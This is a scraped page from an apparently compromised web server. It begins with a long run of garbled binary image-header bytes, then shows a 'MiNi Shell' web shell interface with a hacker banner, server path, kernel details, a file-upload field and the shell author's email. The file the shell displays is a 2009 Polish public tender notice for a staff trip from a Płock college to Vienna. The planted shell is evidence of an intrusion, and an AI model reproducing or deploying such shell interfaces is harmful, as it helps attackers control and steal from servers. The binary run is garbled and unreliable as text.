JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090504/132864-N-2009.html

<p class="kh_header"><b>Płock: Organizacja wycieczki dla pracowników Państwowej Wyższej Szkoły Zawodowej w Płocku do Wiednia.</b><br>
<b>Numer ogłoszenia: 132864 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Płocku , Pl. Dąbrowskiego 2, 09-402 Płock, woj. mazowieckie, tel. 024 3665400, faks 024 3665421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwszplock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wycieczki dla pracowników Państwowej Wyższej Szkoły Zawodowej w Płocku do Wiednia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja wycieczki dla pracowników Państwowej Wyższej Szkoły Zawodowej w Płocku do Wiednia.

1.Wymagany termin realizacji: od 11 czerwca 2009 r. do 14 czerwca 2009 r. 
     2. Miejsce: 
1)	Państwo: Austria.
2)	Miejscowość: Wiedeń.
3. Liczba osób: 41.
4. Wyżywienie na czas pobytu: 3 śniadania oraz 3 obiadokolacje dla wszystkich uczestników 
    Wyjazdu, w tym 1 obiadokolacja w restauracji we Wiedniu.
5. Zakwaterowanie: 41 osób w hotelu o standardzie minimum kat. *** (w pokojach 2 i 3 - 
    osobowych). W każdym pokoju łazienka. Zamawiający dopuszcza zakwaterowanie na 
    terenie Republiki Czeskiej.
6. W ramach realizacji całości przedmiotu zamówienia, Wykonawca zapewni transport 
    wyłącznie dla uczestników wyjazdu (41 osób) autokarem sprawnym technicznie, w stanie 
    czystym, typu: LUX, z działającą klimatyzacją. Autokar będzie do wyłącznej dyspozycji 
    uczestników wyjazdu zarówno podczas podróży, jak i we Wiedniu. Osoba (y), które będą 
    prowadzić autokar muszą posiadać wszystkie niezbędne i aktualne do tego celu 
    uprawnienia.
7. W dniu podpisania umowy Zamawiający uzgodni z Wykonawcą godzinę wyjazdu z 
     Płocka do Wiednia (wyjazd w godzinach rannych). Miejsce wyjazdu: sprzed budynku 
     Instytutu Pedagogiki PWSZ w Płocku przy ul. Gałczyńskiego 28 (dopuszcza się wyjazd z 
     parkingu przy markecie Kaufland). 
8. Zamawiający wymaga następującego programu turystycznego podczas wycieczki 
    (minimum):
1) Dzień 1:
   Przejazd do miejsca zakwaterowania. Po przyjeździe zakwaterowanie w hotelu, kolacja i 
   nocleg.
2) Dzień 2:
    Śniadanie. Zwiedzanie Wiednia z przewodnikiem (4 godz.), w tym: Belweder, objazd
    Ringstrasse autokarem (Urania, Muzeum Sztuki Użytkowej, Park Miejski, Opera, plac 
    Marii Teresy, Hofburg, Parlament, Ratusz, Teatr Zamkowy, Uniwersytet, Kościół 
    Wotywny, budynek Giełdy) i spacer po Starówce. Dalsze zwiedzanie miasta z pilotem z 
    możliwością indywidualnego oglądania komnat i skarbca w Hofburgu. Przejazd na 
    Kahlenberg - pobyt w kościółku św. Józefa. Powrót do hotelu. Kolacja. Nocleg.
3) Dzień 3:
    Śniadanie. Odjazd do Schoenbrunn i zwiedzanie letniej rezydencji Habsburgów, m.in.: 
    apartamentów cesarskich, powozowni oraz ogrodów pałacowych z Gloriettą. Powrót do 
    centrum Wiednia. Czas na indywidualne zwiedzanie Muzeum Historii Sztuki i Muzeum 
    Historii Naturalnej lub obiad. Spacer po Mariahilferstrasse i Karntnerstrasse. Wieczorem 
    kolacja w jednej z wiedeńskich restauracji. Po kolacji powrót do hotelu. Nocleg.
4) Dzień 4:
    Śniadanie. Po śniadaniu przejazd przez Republikę Czeską do Polski..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Ustala się wadium w wysokości: 1 700, 00 złotych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia, tzn. prowadzą działalność gospodarczą w przedmiotowym zakresie, zarejestrowaną w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej.
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
      technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne 
      zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób 
      zdolnych do wykonania zamówienia. 

     1) Wykonawca musi wykazać, że posiada doświadczenie zawodowe niezbędne do 
                wykonania zamówienia, tzn., że wykonał co najmniej dwie usługi odpowiadające 
                swoim rodzajem usługom stanowiącym przedmiot zamówienia, (w okresie 
                ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a 
                jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z podaniem 
                przedmiotu zamówienia, jego wartości, daty wykonania oraz odbiorców - w 
                oparciu o załącznik Nr 4 do SIWZ.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
    zamówienia.

4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

            Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą 
      wykazać, że:
1)	warunek określony w ust. 1 spełnia każdy z Wykonawców,
2)	warunek określony w ust. 2 spełniają łącznie wszyscy Wykonawcy,
3)	warunek określony w ust. 3 spełniają łącznie wszyscy Wykonawcy,
4)	warunek określony w ust. 4 spełnia każdy z Wykonawców.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana w systemie spełnia - nie spełnia, na podstawie wymaganych i dostarczonych dokumentów do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Zamawiający wymaga złożenia w ofercie następujących dokumentów/ oświadczeń/:
1.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych - w oparciu o załącznik Nr 2 do SIWZ.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
3.	Aktualna koncesja lub zezwolenie zezwalające na prowadzenie działalności    gospodarczej w zakresie organizowania imprez turystycznych,
4.	Wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie /wykonawca powinien wykazać się wykonaniem minimum 2 usług odpowiadających rodzajem usługom stanowiących przedmiot zamówienia, potwierdzonych ich należyte wykonanie referencjami/ (wykaz ten opracowany powinien być na formularzu wg wzoru określonego w załączniku nr 4 do SIWZ),
5.	Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (w przypadku niemożliwości spełnienia przez Wykonawcę warunku, o którym mowa w rozdziale 3 ust. 2 niniejszej SIWZ).
6.	Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
7.	Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
   II. Do oferty należy załączyć również:
1. Wypełniony formularz oferty  i formularz cenowy załączony do SIWZ, w oparciu o 
    załącznik Nr 1 i Nr 3 do SIWZ.
2. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio 
    z załączonych dokumentów.
3. Wykaz podwykonawców - w oparciu o załącznik nr 5 do SIWZ.
4. Opis przedmiotu zamówienia - program wycieczki..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pwszplock.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - Państwowa Wyższa Szkoła Zawodowa w Płocku Plac Dąbrowskiego 2, 09-402 Płock, pok. 123..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 11:30, miejsce: W siedzibie Zamawiającego - Państwowa Wyższa Szkoła Zawodowa w Płocku, Pl. Dąbrowskiego 2, 09- 402 Płock - Sekretariat Kanclerza (pok. 202)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com